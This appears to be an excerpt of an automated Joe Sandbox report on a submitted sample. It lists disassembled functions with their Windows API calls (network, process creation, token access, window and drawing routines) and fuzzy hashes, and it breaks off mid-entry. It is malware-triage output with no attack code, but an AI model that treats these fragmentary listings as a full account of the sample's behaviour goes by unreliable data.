Opcode Fuzzy Hash: 597cef5dd446721ed234d843ae2cbdf5191ce9d35c80eabc0201b7f810f09ba4
Instruction Fuzzy Hash: 9A215A71E01208ABDF10DFA4C949BBEB7B8EF54356F184059EC54A7240DB31AA0ADB70

Function 00D71A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D71A97

Part of subcall function 00D71B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00D71B40
Part of subcall function 00D71B21: InternetCloseHandle.WININET(00000000), ref: 00D71BDD

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: a80e256b770aeae9d25d8734cca0cacd06dadb2a8cced286024ec20bff6311bc
Instruction ID: 7c578dcaac73dede912e7c318a64aad71eac0c5f84f9d68900e13a0dda90e3f1
Opcode Fuzzy Hash: a80e256b770aeae9d25d8734cca0cacd06dadb2a8cced286024ec20bff6311bc
Instruction Fuzzy Hash: 5E219F39200601BFEB159F648C01FBAB7A9FF45701F14821AFA5996650FB71D811ABB0

Function 00D5E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00D5E1C4,?,?,?,00D5EFB7,00000000,000000EF,00000119,?,?), ref: 00D5F5BC
Part of subcall function 00D5F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00D5F5E2
Part of subcall function 00D5F5AD: lstrcmpiW.KERNEL32(00000000,?,00D5E1C4,?,?,?,00D5EFB7,00000000,000000EF,00000119,?,?), ref: 00D5F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00D5EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00D5E1DD
lstrcpyW.KERNEL32(00000000,?), ref: 00D5E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,00D5EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00D5E237

Strings

cdecl, xrefs: 00D5E22E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 2db9cacbef073cdd355142fec05d8c88ba2bc09bc90206ced141d3f70c9696f4
Instruction ID: 29b5e293ef1a6ea7aa8b868e971f0a04353df0752fd829704fb973c7f9e7c933
Opcode Fuzzy Hash: 2db9cacbef073cdd355142fec05d8c88ba2bc09bc90206ced141d3f70c9696f4
Instruction Fuzzy Hash: E411BE3A200345EFCF29AF64D84997A77A8FF85311B44802AEC06CB2A4EB71995487B4

Function 00D35332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D35351

Part of subcall function 00D2594C: __FF_MSGBANNER.LIBCMT ref: 00D25963
Part of subcall function 00D2594C: __NMSG_WRITE.LIBCMT ref: 00D2596A
Part of subcall function 00D2594C: RtlAllocateHeap.NTDLL(00FB0000,00000000,00000001,00000000,?,?,?,00D21013,?), ref: 00D2598F

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 738126a57e451b28715e6e86fb5e4d1870e0e56de50401a62914b756a0fe3d63
Instruction ID: 1415fa189105c0c9e7865667d9f8e9fb68a4fc1759ba617b1b0dd70392432819
Opcode Fuzzy Hash: 738126a57e451b28715e6e86fb5e4d1870e0e56de50401a62914b756a0fe3d63
Instruction Fuzzy Hash: 0D11C632505B26AFCB213F70FC45A5D3798DF203E4F14042AF945DA195DE75C94197B0

Function 00D04531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D04560

Part of subcall function 00D0410D: _memset.LIBCMT ref: 00D0418D
Part of subcall function 00D0410D: _wcscpy.LIBCMT ref: 00D041E1
Part of subcall function 00D0410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D041F1

KillTimer.USER32(?,00000001,?,?), ref: 00D045B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D045C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D3D6CE

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: bb4484f5e978cef8edd0ad716ee73a7b0269eda6c754dde86e2ebaa68759aec4
Instruction ID: 1c2af212d85747d143f62d2af840e11f2e051b7fa7f810bc9eb04b3d1753572f
Opcode Fuzzy Hash: bb4484f5e978cef8edd0ad716ee73a7b0269eda6c754dde86e2ebaa68759aec4
Instruction Fuzzy Hash: EF21DAB09047889FE7328B24DC49FE7BBED9F01304F04009DE69D96281C7745A848F71

Function 00D7667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00D05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00D67B20,?,?,00000000), ref: 00D05B8C
Part of subcall function 00D05B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00D67B20,?,?,00000000,?,?), ref: 00D05BB0

gethostbyname.WSOCK32(?,?,?), ref: 00D766AC
WSAGetLastError.WSOCK32(00000000), ref: 00D766B7
_memmove.LIBCMT ref: 00D766E4
inet_ntoa.WSOCK32(?), ref: 00D766EF

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: e6a2fb07481810acba8c5a02a24b64189d32c89eb626ae0a14a7b37af0edbc6e
Instruction ID: e8f5abaf68aa5f4a79ec7dfd2a507cddeae593b6236a108e1d2c390c9ea005c9
Opcode Fuzzy Hash: e6a2fb07481810acba8c5a02a24b64189d32c89eb626ae0a14a7b37af0edbc6e
Instruction Fuzzy Hash: 91114275500505AFCB04EBA4D996EAEB7B8EF54310B144065F90AA72A2EB30AE14DB71

Function 00D59023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00D59043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D59055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D5906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D59086

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 62e99978479f979d595c15b302aa1faa57147b5f22a9a4fddfc55e6ee16b03e8
Instruction ID: 327a29716836565e415082b521cd42e3e522eaeba977dcbace09fd269ef94198
Opcode Fuzzy Hash: 62e99978479f979d595c15b302aa1faa57147b5f22a9a4fddfc55e6ee16b03e8
Instruction Fuzzy Hash: 59114C79900218FFDF10DFA9C885E9DFB74FB48310F204095E904B7290D6716E50DBA0

Function 00D01290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00D02612: GetWindowLongW.USER32(?,000000EB), ref: 00D02623

DefDlgProcW.USER32(?,00000020,?), ref: 00D012D8
GetClientRect.USER32(?,?), ref: 00D3B84B
GetCursorPos.USER32(?), ref: 00D3B855
ScreenToClient.USER32(?,?), ref: 00D3B860

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: f93d1139614850d1b04f30f00b4fa7cd6f5455028099717a5c2610fa4c058fd4
Instruction ID: 42816b84bab684e9942227626352b00fe597d222e76f923e15d30e4c9255ae59
Opcode Fuzzy Hash: f93d1139614850d1b04f30f00b4fa7cd6f5455028099717a5c2610fa4c058fd4
Instruction Fuzzy Hash: 04113A39910119EFCB00EFA8D88AAFE77B8FB05300F400456F945E7290D730BA519BB9

Function 00D61652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D601FD,?,00D61250,?,00008000), ref: 00D6166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00D601FD,?,00D61250,?,00008000), ref: 00D61694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D601FD,?,00D61250,?,00008000), ref: 00D6169E
Sleep.KERNEL32(?,?,?,?,?,?,?,00D601FD,?,00D61250,?,00008000), ref: 00D616D1

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 74f8890189b474a8c772b18b8917dc226348ab528bb582b8a98eba7165180faf
Instruction ID: 775c1421abac386f092196aac8428cd38817f83b20bdfcab851c75f57f997882
Opcode Fuzzy Hash: 74f8890189b474a8c772b18b8917dc226348ab528bb582b8a98eba7165180faf
Instruction Fuzzy Hash: F9112739C1062DEBCF009FE5D948AEEBB78FF19751F09445AE980F6240CB7095648BB6

Function 00D37207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00D3722B

Part of subcall function 00D37912: __fltout2.LIBCMT ref: 00D3793B

__cftog_l.LIBCMT ref: 00D37251
__cftoe_l.LIBCMT ref: 00D37283

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 19b7eee001fb3e9d9ea645733d432c9a930f7df4a8eeb44f98ee38baf4b08088
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 39014EBA04458EBBCF225E84CC018EE3F62BF59355F588615FE1858031D236C9B1BBA5

Function 00D8B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00D8B59E
ScreenToClient.USER32(?,?), ref: 00D8B5B6
ScreenToClient.USER32(?,?), ref: 00D8B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D8B5F5

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 2108fa51d500029845b12ad34ca1ab2a2e729d09a9d21cf7f5e6ec0c32bc1d0a
Instruction ID: a611956d0828f1bc614eabc89e723d72b2d6ed408daf47a943e1e70d1f01d008
Opcode Fuzzy Hash: 2108fa51d500029845b12ad34ca1ab2a2e729d09a9d21cf7f5e6ec0c32bc1d0a
Instruction Fuzzy Hash: E61134B5D00209EFDB41DF99C4459EEBBB5FB08310F104166E954E2720D735AA558F60

Function 00D8B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D8B8FE
_memset.LIBCMT ref: 00D8B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00DC7F20,00DC7F64), ref: 00D8B93C
CloseHandle.KERNEL32 ref: 00D8B94E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: dbe86b79af3224b036b46935f99a1e1c24a2129c17d3fa40c41890b0ba81a87b
Instruction ID: 81016ebad9203801c77367838163ae756e11906ca207d6ee2405e4d46cb844ff
Opcode Fuzzy Hash: dbe86b79af3224b036b46935f99a1e1c24a2129c17d3fa40c41890b0ba81a87b
Instruction Fuzzy Hash: C2F082B26443127BF2102B61AC85FBB3A5CEF09358F000029FB08D6392D7755D008BB8

Function 00D66E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00D66E88

Part of subcall function 00D6794E: _memset.LIBCMT ref: 00D67983

_memmove.LIBCMT ref: 00D66EAB
_memset.LIBCMT ref: 00D66EB8
LeaveCriticalSection.KERNEL32(?), ref: 00D66EC8

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 02b358b8f9528b2bf00cdc0cd793874b7a82bd655516d81ec7241b6a7e3c6d92
Instruction ID: 363aaf258ac246b2870eee5b89e7eae3064ec286b51c0db8386533f9f830aeed
Opcode Fuzzy Hash: 02b358b8f9528b2bf00cdc0cd793874b7a82bd655516d81ec7241b6a7e3c6d92
Instruction Fuzzy Hash: F3F0543A200214ABCF016F55EC85F49BB29EF55324B04C061FE089E21AC735A911DBB4

Function 00D8C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00D012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D0134D
Part of subcall function 00D012F3: SelectObject.GDI32(?,00000000), ref: 00D0135C
Part of subcall function 00D012F3: BeginPath.GDI32(?), ref: 00D01373
Part of subcall function 00D012F3: SelectObject.GDI32(?,00000000), ref: 00D0139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00D8C030
LineTo.GDI32(00000000,?,?), ref: 00D8C03D
EndPath.GDI32(00000000), ref: 00D8C04D
StrokePath.GDI32(00000000), ref: 00D8C05B

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 580cd9477c41963608e351b35d26a9f38b732baae74c5d5b334db9405def187a
Instruction ID: 31f6a65072cc93269026cff76480038a250b2a41bac9ffe1268b7fc4853fed62
Opcode Fuzzy Hash: 580cd9477c41963608e351b35d26a9f38b732baae74c5d5b334db9405def187a
Instruction Fuzzy Hash: EDF0BE3101031AFBDB126F90AC0AFCE3F59AF05310F144000FA11A12E287758560DBB5

Function 00D5A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00D5A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 00D5A3AC
GetCurrentThreadId.KERNEL32 ref: 00D5A3B3
AttachThreadInput.USER32(00000000), ref: 00D5A3BA

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 3ba213ff47edd64e6ccdf0f8d29591439836396f99e721a476b0acd418426ae6
Instruction ID: 11ef889e213841f00afd862b1549059c71fdba547ae4bb07adbf9685e2d63a93
Opcode Fuzzy Hash: 3ba213ff47edd64e6ccdf0f8d29591439836396f99e721a476b0acd418426ae6
Instruction Fuzzy Hash: D0E03931141338BAEB202BA2DC0DED73F1CEF167A2F048224F908C4060D675C554CBB0

Function 00D02218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00D02231
SetTextColor.GDI32(?,000000FF), ref: 00D0223B
SetBkMode.GDI32(?,00000001), ref: 00D02250
GetStockObject.GDI32(00000005), ref: 00D02258
GetWindowDC.USER32(?,00000000), ref: 00D3C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 00D3C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 00D3C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 00D3C112
GetPixel.GDI32(00000000,?,?), ref: 00D3C132
ReleaseDC.USER32(?,00000000), ref: 00D3C13D

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 8b15fbf20403c02aea7d5c3e9218f4b91e92330d1750e4f9d04e2623a1126f41
Instruction ID: 0d77ef5e0a2e5fb497786e019801048abced2e939429b670e90685a8f54f2a0f
Opcode Fuzzy Hash: 8b15fbf20403c02aea7d5c3e9218f4b91e92330d1750e4f9d04e2623a1126f41
Instruction Fuzzy Hash: 3BE06D32110344EADB215FB4FC0D7D83B14EB05732F148366FA69981E187724990DB31

Function 00D58C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00D58C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,00D5882E), ref: 00D58C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00D5882E), ref: 00D58C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,00D5882E), ref: 00D58C7E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 20135ed488ccf36990c4637fa3e2c4d70c0907992a69cb2ebbc03cfa44b6fa0e
Instruction ID: ef6d00ec8f7392e5b2d739529053d9b78fe74f8d464d085a9716d00d1eacb1c0
Opcode Fuzzy Hash: 20135ed488ccf36990c4637fa3e2c4d70c0907992a69cb2ebbc03cfa44b6fa0e
Instruction Fuzzy Hash: 5AE04F366523119BDB205FB06D0CB563BA8AF54B92F184828AA45D9140DA3484459B71

Function 00D42187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00D42187
GetDC.USER32(00000000), ref: 00D42191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D421B1
ReleaseDC.USER32(?), ref: 00D421D2

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
